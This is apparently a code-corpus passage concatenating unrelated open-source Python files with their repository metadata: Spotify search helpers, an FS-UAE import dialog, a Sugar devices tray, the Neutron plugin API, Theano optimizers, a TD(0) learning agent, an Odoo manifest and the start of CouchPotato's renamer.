logging.error('error in getting playlist {playlist_id} for user {user}: {e}'.format(
user=user_id, playlist_id=playlist_id, e=e))
raise
for playlist in playlists['items']:
if playlist['owner']['id'] == user_id and playlist['id'] == playlist_id:
return True
return False
def get_track_ids_from_track_info(self, track_info):
"""
Returns the best guess track id for the supplied track info
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
"""
track_ids = []
for track in track_info:
track_id = self.get_track_id_from_track_info(track)
logging.info("retrieved track id {} for {}".format(track_id, track))
track_ids.append(track_id)
return track_ids
def get_track_id_from_track_info(self, track_info):
returned_tracks = None
try:
returned_tracks = self.search_track(track_info)['tracks']['items']
except:
e = sys.exc_info()[0]
logging.error('error in searching for track {track}: {e}'.format(track=track_info, e=e))
raise
if len(returned_tracks) == 0:
logging.warning('Unable to retrieve id for {track}, skipping'.format(track=track_info))
return 0
return returned_tracks[0]['id']
def search_track(self, track_info, limit=1):
"""
Gets list of possible tracks for the supplied track information
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
"""
logging.debug('track info {track_info}'.format(track_info=track_info))
query = None
try:
query = '{track} {artist}'.format(track=track_info['track'], artist=track_info['artist'])
except:
query = '{}'.format(track_info['blob'])
logging.info('searching spotify with query {query}'.format(query=query))
try:
retrieved_tracks = self.ccm_spotipy.search(query, limit=limit)
except:
e = sys.exc_info()[0]
logging.error('error in retrieving tracks for {track_info}... error: {error}'.format(
track_info=track_info, error=e))
raise
logging.debug('retrieved tracks {tracks}'.format(tracks=retrieved_tracks))
return retrieved_tracks
|
mit
|
uhef/fs-uae-gles
|
launcher/fs_uae_launcher/ui/imports/ImportGroup.py
|
2
|
2904
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import fs_uae_launcher.fsui as fsui
from ...I18N import _, ngettext
from ...Signal import Signal
from .ImportDialog import ImportDialog
class ImportGroup(fsui.Group):
AMIGA_FOREVER = 1
def __init__(self, parent, type=0):
fsui.Group.__init__(self, parent)
self.type = type
self.layout = fsui.VerticalLayout()
if self.type == self.AMIGA_FOREVER:
title = _("Import From Amiga Forever CD/DVD")
else:
title = _("Import Kickstarts and ROMs")
label = fsui.HeadingLabel(self, title)
self.layout.add(label, margin=10)
icon_layout = fsui.HorizontalLayout()
self.layout.add(icon_layout, fill=True)
icon_layout.add_spacer(20)
if self.type == self.AMIGA_FOREVER:
image = fsui.Image("fs_uae_launcher:res/amiga_forever_group.png")
else:
image = fsui.Image("fs_uae_launcher:res/kickstart.png")
self.image_view = fsui.ImageView(self, image)
icon_layout.add(self.image_view, valign=0.0, margin=10)
vert_layout = fsui.VerticalLayout()
icon_layout.add(vert_layout, fill=True, expand=True)
if self.type == self.AMIGA_FOREVER:
text = _("If you own Amiga Forever, select the drive/folder "
"and click \"{0}\"").format(_("Import"))
else:
text = _("Select a folder containing Amiga kickstart files "
"and click \"{0}\"").format(_("Import"))
label = fsui.Label(self, text)
vert_layout.add(label, margin=10)
hori_layout = fsui.HorizontalLayout()
vert_layout.add(hori_layout, fill=True, margin=10)
self.text_field = fsui.TextField(self, "", read_only=True)
hori_layout.add(self.text_field, expand=True)#, expand=True, fill=True)
self.browse_button = fsui.Button(self, _("Browse"))
self.browse_button.on_activate = self.on_browse
hori_layout.add(self.browse_button, margin_left=10)
self.import_button = fsui.Button(self, _("Import"))
self.import_button.on_activate = self.on_import
self.import_button.disable()
hori_layout.add(self.import_button, margin_left=10)
def set_path(self, path):
self.path = path
self.text_field.set_text(path)
self.import_button.enable()
def on_browse(self):
dialog = fsui.DirDialog(self.get_window(),
_("Select Source Directory"))
if dialog.show_modal():
self.set_path(dialog.get_path())
dialog.destroy()
def on_import(self):
dialog = ImportDialog(self.get_window(), self.path, self.type)
dialog.show_modal()
dialog.destroy()
Signal.broadcast("scan_done")
|
gpl-2.0
|
guarddogofww/cs108test
|
src/jarabe/frame/devicestray.py
|
4
|
1901
|
# Copyright (C) 2008 One Laptop Per Child
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import logging
from sugar3.graphics import tray
from jarabe import config
class DevicesTray(tray.HTray):
def __init__(self):
tray.HTray.__init__(self, align=tray.ALIGN_TO_END)
for f in os.listdir(os.path.join(config.ext_path, 'deviceicon')):
if f.endswith('.py') and not f.startswith('__'):
module_name = f[:-3]
try:
mod = __import__('deviceicon.' + module_name, globals(),
locals(), [module_name])
mod.setup(self)
except Exception:
logging.exception('Exception while loading extension:')
def add_device(self, view):
index = 0
relative_index = getattr(view, 'FRAME_POSITION_RELATIVE', -1)
for item in self.get_children():
current_relative_index = getattr(item, 'FRAME_POSITION_RELATIVE',
0)
if current_relative_index >= relative_index:
index += 1
else:
break
self.add_item(view, index=index)
view.show()
def remove_device(self, view):
self.remove_item(view)
|
gpl-3.0
|
Juniper/contrail-dev-neutron
|
neutron/neutron_plugin_base_v2.py
|
6
|
13983
|
# Copyright 2011 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
v2 Neutron Plug-in API specification.
:class:`NeutronPluginBaseV2` provides the definition of minimum set of
methods that needs to be implemented by a v2 Neutron Plug-in.
"""
from abc import ABCMeta, abstractmethod
import six
@six.add_metaclass(ABCMeta)
class NeutronPluginBaseV2(object):
@abstractmethod
def create_subnet(self, context, subnet):
"""Create a subnet.
Create a subnet, which represents a range of IP addresses
that can be allocated to devices
:param context: neutron api request context
:param subnet: dictionary describing the subnet, with keys
as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. All keys will
be populated.
"""
pass
@abstractmethod
def update_subnet(self, context, id, subnet):
"""Update values of a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to update.
:param subnet: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_subnet(self, context, id, fields=None):
"""Retrieve a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to fetch.
:param fields: a list of strings that are valid keys in a
subnet dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_subnets(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of subnets.
The contents of the list depends on
the identity of the user making the request (as indicated by the
context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a subnet as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`.
Values in this dictiontary are an iterable containing
values that will be used for an exact match comparison
for that value. Each result returned by this
function will have matched one of the values for each
key in filters.
:param fields: a list of strings that are valid keys in a
subnet dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_subnets_count(self, context, filters=None):
"""Return the number of subnets.
The result depends on the identity of
the user making the request (as indicated by the context) as well as
any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
dictiontary are an iterable containing values that
will be used for an exact match comparison for that
value. Each result returned by this function will
have matched one of the values for each key in filters.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_subnet(self, context, id):
"""Delete a subnet.
:param context: neutron api request context
:param id: UUID representing the subnet to delete.
"""
pass
@abstractmethod
def create_network(self, context, network):
"""Create a network.
Create a network, which represents an L2 network segment which
can have a set of subnets and ports associated with it.
:param context: neutron api request context
:param network: dictionary describing the network, with keys
as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. All keys will
be populated.
"""
pass
@abstractmethod
def update_network(self, context, id, network):
"""Update values of a network.
:param context: neutron api request context
:param id: UUID representing the network to update.
:param network: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_network(self, context, id, fields=None):
"""Retrieve a network.
:param context: neutron api request context
:param id: UUID representing the network to fetch.
:param fields: a list of strings that are valid keys in a
network dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_networks(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of networks.
The contents of the list depends on
the identity of the user making the request (as indicated by the
context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
dictiontary are an iterable containing values that will
be used for an exact match comparison for that value.
Each result returned by this function will have matched
one of the values for each key in filters.
:param fields: a list of strings that are valid keys in a
network dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_networks_count(self, context, filters=None):
"""Return the number of networks.
The result depends on the identity
of the user making the request (as indicated by the context) as well
as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object
in :file:`neutron/api/v2/attributes.py`. Values in
this dictiontary are an iterable containing values that
will be used for an exact match comparison for that
value. Each result returned by this function will have
matched one of the values for each key in filters.
NOTE: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_network(self, context, id):
"""Delete a network.
:param context: neutron api request context
:param id: UUID representing the network to delete.
"""
pass
@abstractmethod
def create_port(self, context, port):
"""Create a port.
Create a port, which is a connection point of a device (e.g., a VM
NIC) to attach to a L2 neutron network.
:param context: neutron api request context
:param port: dictionary describing the port, with keys as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. All keys will be
populated.
"""
pass
@abstractmethod
def update_port(self, context, id, port):
"""Update values of a port.
:param context: neutron api request context
:param id: UUID representing the port to update.
:param port: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for
'allow_put' as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`.
"""
pass
@abstractmethod
def get_port(self, context, id, fields=None):
"""Retrieve a port.
:param context: neutron api request context
:param id: UUID representing the port to fetch.
:param fields: a list of strings that are valid keys in a port
dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
@abstractmethod
def get_ports(self, context, filters=None, fields=None,
sorts=None, limit=None, marker=None, page_reverse=False):
"""Retrieve a list of ports.
The contents of the list depends on the identity of the user making
the request (as indicated by the context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a port as listed in the :obj:`RESOURCE_ATTRIBUTE_MAP`
object in :file:`neutron/api/v2/attributes.py`. Values
in this dictiontary are an iterable containing values
that will be used for an exact match comparison for
that value. Each result returned by this function will
have matched one of the values for each key in filters.
:param fields: a list of strings that are valid keys in a
port dictionary as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Only these fields
will be returned.
"""
pass
def get_ports_count(self, context, filters=None):
"""Return the number of ports.
The result depends on the identity of the user making the request
(as indicated by the context) as well as any filters.
:param context: neutron api request context
:param filters: a dictionary with keys that are valid keys for
a network as listed in the
:obj:`RESOURCE_ATTRIBUTE_MAP` object in
:file:`neutron/api/v2/attributes.py`. Values in this
dictiontary are an iterable containing values that will
be used for an exact match comparison for that value.
Each result returned by this function will have matched
one of the values for each key in filters.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
@abstractmethod
def delete_port(self, context, id):
"""Delete a port.
:param context: neutron api request context
:param id: UUID representing the port to delete.
"""
pass
def start_rpc_listener(self):
"""Start the rpc listener.
Most plugins start an RPC listener implicitly on initialization. In
order to support multiple process RPC, the plugin needs to expose
control over when this is started.
.. note:: this method is optional, as it was not part of the originally
defined plugin API.
"""
raise NotImplementedError
|
apache-2.0
|
taolei87/rcnn
|
code/nn/optimization.py
|
1
|
9054
|
'''
This file implements various optimization methods, including
-- SGD with gradient norm clipping
-- AdaGrad
-- AdaDelta
-- Adam
Transparent to switch between CPU / GPU.
@author: Tao Lei ([email protected])
'''
import random
from collections import OrderedDict
import numpy as np
import theano
import theano.tensor as T
from theano.sandbox.cuda.basic_ops import HostFromGpu
from theano.sandbox.cuda.var import CudaNdarraySharedVariable
from theano.printing import debugprint
from .initialization import default_mrng
def create_optimization_updates(
cost, params, method="sgd",
max_norm=5, updates=None, gradients=None,
lr=0.01, eps=None, rho=0.99, gamma=0.999,
beta1=0.9, beta2=0.999, momentum=0.0):
_momentum = momentum
lr = theano.shared(np.float64(lr).astype(theano.config.floatX))
rho = theano.shared(np.float64(rho).astype(theano.config.floatX))
beta1 = theano.shared(np.float64(beta1).astype(theano.config.floatX))
beta2 = theano.shared(np.float64(beta2).astype(theano.config.floatX))
momentum = theano.shared(np.float64(momentum).astype(theano.config.floatX))
gamma = theano.shared(np.float64(gamma).astype(theano.config.floatX))
if eps is None:
eps = 1e-8 if method.lower() != "esgd" else 1e-4
eps = np.float64(eps).astype(theano.config.floatX)
gparams = T.grad(cost, params) if gradients is None else gradients
g_norm = 0
for g in gparams:
g_norm = g_norm + g.norm(2)**2
g_norm = T.sqrt(g_norm)
# max_norm is useful for sgd
if method != "sgd": max_norm = None
if max_norm is not None and max_norm is not False:
max_norm = theano.shared(np.float64(max_norm).astype(theano.config.floatX))
shrink_factor = T.minimum(max_norm, g_norm + eps) / (g_norm + eps)
gparams_clipped = [ ]
for g in gparams:
g = shrink_factor * g
gparams_clipped.append(g)
gparams = gparams_clipped
if updates is None:
updates = OrderedDict()
gsums = create_accumulators(params) if method != "sgd" or _momentum > 0.0 else \
[ None for p in params ]
xsums = create_accumulators(params) if method != "sgd" and method != "adagrad" else None
if method == "sgd":
create_sgd_updates(updates, params, gparams, gsums, lr, momentum)
elif method == "adagrad":
create_adagrad_updates(updates, params, gparams, gsums, lr, eps)
elif method == "adadelta":
create_adadelta_updates(updates, params, gparams, gsums, xsums, lr, eps, rho)
elif method == "adam":
create_adam_updates(updates, params, gparams, gsums, xsums, lr, eps, beta1, beta2)
elif method == "esgd":
create_esgd_updates(updates, params, gparams, gsums, xsums, lr, eps, gamma, momentum)
else:
raise Exception("Unknown optim method: {}\n".format(method))
if method == "adadelta":
lr = rho
return updates, lr, g_norm, gsums, xsums, max_norm
def is_subtensor_op(p):
if hasattr(p, 'owner') and hasattr(p.owner, 'op'):
return isinstance(p.owner.op, T.AdvancedSubtensor1) or \
isinstance(p.owner.op, T.Subtensor)
return False
def get_subtensor_op_inputs(p):
origin, indexes = p.owner.inputs
if hasattr(origin, 'owner') and hasattr(origin.owner, 'op') and \
isinstance(origin.owner.op, HostFromGpu):
origin = origin.owner.inputs[0]
assert isinstance(origin, CudaNdarraySharedVariable)
return origin, indexes
def get_similar_subtensor(matrix, indexes, param_op):
'''
So far there is only two possible subtensor operation used.
'''
if isinstance(param_op.owner.op, T.AdvancedSubtensor1):
return matrix[indexes]
else:
# indexes is start index in this case
return matrix[indexes:]
def create_accumulators(params):
accums = [ ]
for p in params:
if is_subtensor_op(p):
origin, _ = get_subtensor_op_inputs(p)
acc = theano.shared(np.zeros_like(origin.get_value(borrow=True), \
dtype=theano.config.floatX))
else:
acc = theano.shared(np.zeros_like(p.get_value(borrow=True), \
dtype=theano.config.floatX))
accums.append(acc)
return accums
def create_sgd_updates(updates, params, gparams, gsums, lr, momentum):
has_momentum = momentum.get_value() > 0.0
for p, g, acc in zip(params, gparams, gsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
if has_momentum:
acc_slices = get_similar_subtensor(acc, indexes, p)
new_acc = acc_slices*momentum + g
updates[acc] = T.set_subtensor(acc_slices, new_acc)
else:
new_acc = g
updates[origin] = T.inc_subtensor(p, - lr * new_acc)
else:
if has_momentum:
new_acc = acc*momentum + g
updates[acc] = new_acc
else:
new_acc = g
updates[p] = p - lr * new_acc
def create_adagrad_updates(updates, params, gparams, gsums, lr, eps):
for p, g, acc in zip(params, gparams, gsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
#acc_slices = acc[indexes]
acc_slices = get_similar_subtensor(acc, indexes, p)
new_acc = acc_slices + g**2
updates[acc] = T.set_subtensor(acc_slices, new_acc)
updates[origin] = T.inc_subtensor(p, \
- lr * (g / T.sqrt(new_acc + eps)))
else:
new_acc = acc + g**2
updates[acc] = new_acc
updates[p] = p - lr * (g / T.sqrt(new_acc + eps))
#updates[p] = p - lr * (g / (T.sqrt(new_acc) + eps))
# which one to use?
def create_adadelta_updates(updates, params, gparams, gsums, xsums,\
lr, eps, rho):
for p, g, gacc, xacc in zip(params, gparams, gsums, xsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
gacc_slices = gacc[indexes]
xacc_slices = xacc[indexes]
new_gacc = rho * gacc_slices + (1.0-rho) * g**2
d = -T.sqrt((xacc_slices + eps)/(new_gacc + eps)) * g
new_xacc = rho * xacc_slices + (1.0-rho) * d**2
updates[gacc] = T.set_subtensor(gacc_slices, new_gacc)
updates[xacc] = T.set_subtensor(xacc_slices, new_xacc)
updates[origin] = T.inc_subtensor(p, d)
else:
new_gacc = rho * gacc + (1.0-rho) * g**2
d = -T.sqrt((xacc + eps)/(new_gacc + eps)) * g
new_xacc = rho * xacc + (1.0-rho) * d**2
updates[gacc] = new_gacc
updates[xacc] = new_xacc
updates[p] = p + d
def create_adam_updates(updates, params, gparams, gsums, xsums, \
lr, eps, beta1, beta2):
i = theano.shared(np.float64(0.0).astype(theano.config.floatX))
i_t = i + 1.0
omb1_t = 1.0 - beta1**i_t
omb2_t = 1.0 - beta2**i_t
lr_t = lr * (T.sqrt(omb2_t) / omb1_t)
for p, g, m, v in zip(params, gparams, gsums, xsums):
if is_subtensor_op(p):
origin, indexes = get_subtensor_op_inputs(p)
m_sub = m[indexes]
v_sub = v[indexes]
m_t = beta1*m_sub + (1.0-beta1)*g
v_t = beta2*v_sub + (1.0-beta2)*T.sqr(g)
g_t = m_t / (T.sqrt(v_t) + eps)
updates[m] = T.set_subtensor(m_sub, m_t)
updates[v] = T.set_subtensor(v_sub, v_t)
updates[origin] = T.inc_subtensor(p, -lr_t*g_t)
else:
m_t = beta1*m + (1.0-beta1)*g
v_t = beta2*v + (1.0-beta2)*T.sqr(g)
g_t = m_t / (T.sqrt(v_t) + eps)
updates[m] = m_t
updates[v] = v_t
updates[p] = p - lr_t*g_t
updates[i] = i_t
def create_esgd_updates(updates, params, gparams, gsums, xsums, lr, eps, gamma, momentum):
has_momentum = momentum.get_value() > 0.0
samples = [ default_mrng.normal(size=p.shape, avg=0, std=1,
dtype=theano.config.floatX) for p in params ]
HVs = T.Lop(gparams, params, samples)
i = theano.shared(np.float64(0.0).astype(theano.config.floatX))
i_t = i + 1.0
omg_t = 1.0 - gamma**i_t
for p, g, m, D, Hv in zip(params, gparams, gsums, xsums, HVs):
if is_subtensor_op(p):
raise Exception("ESGD subtensor update not implemented!")
else:
D_t = D * gamma + T.sqr(Hv) * (1.0-gamma)
if has_momentum:
m_t = m*momentum + g
updates[m] = m_t
else:
m_t = g
g_t = m_t / ( T.sqrt(D_t/omg_t + eps) )
#g_t = m_t / ( T.sqrt(D_t + eps) )
updates[D] = D_t
updates[p] = p - lr*g_t
updates[i] = i_t
|
apache-2.0
|
jeremiedecock/pyai
|
ailib/mdp/agent/td0.py
|
1
|
4686
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2014,2015,2016,2017 Jeremie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# TODO: improve this ?
if __name__ == '__main__':
import agent
else:
from . import agent
import numpy as np
class Agent(agent.Agent):
"""
Temporal Difference Learning "TD(0)".
This is a passive RL algorithm (approximate V function for a given policy).
Parameters:
- self.learningRate : the learning rate (often noted alpha)
- self.discountFactor : the discount factor (often noted gamma)
See: Stuart Russell, Peter Norvig, "Intelligence artificielle", 2e édition,
Pearson, 2006, pp. 854-857.
"""
def __init__(self, environment, policy, number_of_simulations = 10000):
self.environment = environment
self.policy = policy
self.learningRate = lambda n : 1.0/n
self.discountFactor = 0.999
initial_state_set = {None} # perform all simulations from the default initial state (some states may not be explored...)
#initial_state_set = environment.stateSet # perform simulations from all states (all states are explored)
# Init value utility to 0
self.valueUtility = {state:None for state in self.environment.stateSet}
self.stateVisitDict = {state:0 for state in self.environment.stateSet}
for initial_state in initial_state_set:
for simulation_index in range(number_of_simulations):
# Do the simulation
(state_list, action_list, reward_list) = environment.simulate(self, initial_state=initial_state, max_it=100)
previous_state = None
previous_reward = None
for index in range(len(state_list)):
current_state = state_list[index]
current_reward = reward_list[index]
if self.valueUtility[current_state] is None:
self.valueUtility[current_state] = current_reward
if previous_state is not None:
#print(index, previous_state, previous_reward, current_state, current_reward, self.valueUtility[previous_state], self.valueUtility[current_state])
self.stateVisitDict[previous_state] += 1 # What about the last visited state of the simulation ? -> no problem as we won't call alpha(current_state) but only alpha(previous_state)
alpha = self.learningRate(self.stateVisitDict[previous_state])
self.valueUtility[previous_state] = self.valueUtility[previous_state] + alpha * (previous_reward + self.discountFactor * self.valueUtility[current_state] - self.valueUtility[previous_state])
previous_state = current_state
previous_reward = current_reward
# Display
#print(self.valueUtility)
#environment.displayValueFunction(self.valueUtility, iteration=simulation_index)
environment.displayValueFunction(self.valueUtility, iteration=simulation_index)
def getAction(self, state):
"""
Returns the action to be performed by the agent for a given state.
"""
action = self.policy[state]
return action
if __name__ == '__main__':
from environment.maze import Environment
environment = Environment()
policy = { (0,2):'right', (1,2):'right', (2,2):'right',
(0,1):'up', (2,1):'up',
(0,0):'up', (1,0):'left', (2,0):'left', (3,0):'left' }
agent = Agent(environment, policy)
|
mit
|
gsmartway/odoo
|
addons/stock_dropshipping/__openerp__.py
|
260
|
2037
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP S.A. (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Drop Shipping',
'version': '1.0',
'category': 'Warehouse Management',
'summary': 'Drop Shipping',
'description': """
Manage drop shipping orders
===========================
This module adds a pre-configured Drop Shipping picking type
as well as a procurement route that allow configuring Drop
Shipping products and orders.
When drop shipping is used the goods are directly transferred
from suppliers to customers (direct delivery) without
going through the retailer's warehouse. In this case no
internal transfer document is needed.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/warehouse',
'depends': ['purchase', 'sale_stock'],
'data': ['stock_dropshipping.xml'],
'test': [
'test/cancellation_propagated.yml',
'test/crossdock.yml',
'test/dropship.yml',
'test/procurementexception.yml',
'test/lifo_price.yml'
],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
multikatt/CouchPotatoServer
|
couchpotato/core/plugins/renamer.py
|
13
|
70976
|
import fnmatch
import os
import re
import shutil
import time
import traceback
from couchpotato import get_db
from couchpotato.api import addApiView
from couchpotato.core.event import addEvent, fireEvent, fireEventAsync
from couchpotato.core.helpers.encoding import toUnicode, ss, sp
from couchpotato.core.helpers.variable import getExt, mergeDicts, getTitle, \
getImdb, link, symlink, tryInt, splitString, fnEscape, isSubFolder, \
getIdentifier, randomString, getFreeSpace, getSize
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from unrar2 import RarFile
import six
from six.moves import filter
log = CPLog(__name__)
autoload = 'Renamer'
class Renamer(Plugin):
renaming_started = False
checking_snatched = False
def __init__(self):
addApiView('renamer.scan', self.scanView, docs = {
'desc': 'For the renamer to check for new files to rename in a folder',
'params': {
'async': {'desc': 'Optional: Set to 1 if you dont want to fire the renamer.scan asynchronous.'},
'to_folder': {'desc': 'Optional: The folder to move releases to. Leave empty for default folder.'},
'media_folder': {'desc': 'Optional: The folder of the media to scan. Keep empty for default renamer folder.'},
'files': {'desc': 'Optional: Provide the release files if more releases are in the same media_folder, delimited with a \'|\'. Note that no dedicated release folder is expected for releases with one file.'},
'base_folder': {'desc': 'Optional: The folder to find releases in. Leave empty for default folder.'},
'downloader': {'desc': 'Optional: The downloader the release has been downloaded with. \'download_id\' is required with this option.'},
'download_id': {'desc': 'Optional: The nzb/torrent ID of the release in media_folder. \'downloader\' is required with this option.'},
'status': {'desc': 'Optional: The status of the release: \'completed\' (default) or \'seeding\''},
},
})
addApiView('renamer.progress', self.getProgress, docs = {
'desc': 'Get the progress of current renamer scan',
'return': {'type': 'object', 'example': """{
'progress': False || True,
}"""},
})
addEvent('renamer.scan', self.scan)
addEvent('renamer.check_snatched', self.checkSnatched)
addEvent('app.load', self.scan)
addEvent('app.load', self.setCrons)
# Enable / disable interval
addEvent('setting.save.renamer.enabled.after', self.setCrons)
addEvent('setting.save.renamer.run_every.after', self.setCrons)
addEvent('setting.save.renamer.force_every.after', self.setCrons)
def setCrons(self):
fireEvent('schedule.remove', 'renamer.check_snatched')
if self.isEnabled() and self.conf('run_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched', self.checkSnatched, minutes = self.conf('run_every'), single = True)
fireEvent('schedule.remove', 'renamer.check_snatched_forced')
if self.isEnabled() and self.conf('force_every') > 0:
fireEvent('schedule.interval', 'renamer.check_snatched_forced', self.scan, hours = self.conf('force_every'), single = True)
return True
def getProgress(self, **kwargs):
return {
'progress': self.renaming_started
}
def scanView(self, **kwargs):
async = tryInt(kwargs.get('async', 0))
base_folder = kwargs.get('base_folder')
media_folder = sp(kwargs.get('media_folder'))
to_folder = kwargs.get('to_folder')
# Backwards compatibility, to be removed after a few versions :)
if not media_folder:
media_folder = sp(kwargs.get('movie_folder'))
downloader = kwargs.get('downloader')
download_id = kwargs.get('download_id')
files = [sp(filename) for filename in splitString(kwargs.get('files'), '|')]
status = kwargs.get('status', 'completed')
release_download = None
if not base_folder and media_folder:
release_download = {'folder': media_folder}
if download_id:
release_download.update({
'id': download_id,
'downloader': downloader,
'status': status,
'files': files
})
fire_handle = fireEvent if not async else fireEventAsync
fire_handle('renamer.scan', base_folder = base_folder, release_download = release_download, to_folder = to_folder)
return {
'success': True
}
def scan(self, base_folder = None, release_download = None, to_folder = None):
if not release_download: release_download = {}
if self.isDisabled():
return
if self.renaming_started is True:
log.info('Renamer is already running, if you see this often, check the logs above for errors.')
return
if not base_folder:
base_folder = sp(self.conf('from'))
from_folder = sp(self.conf('from'))
if not to_folder:
to_folder = sp(self.conf('to'))
# Get media folder to process
media_folder = sp(release_download.get('folder'))
# Get all folders that should not be processed
no_process = [to_folder]
cat_list = fireEvent('category.all', single = True) or []
no_process.extend([item['destination'] for item in cat_list])
# Check to see if the no_process folders are inside the "from" folder.
if not os.path.isdir(base_folder) or not os.path.isdir(to_folder):
log.error('Both the "To" and "From" folder have to exist.')
return
else:
for item in no_process:
if isSubFolder(item, base_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the "from" folder. "%s" in "%s"', (item, base_folder))
return
# Check to see if the no_process folders are inside the provided media_folder
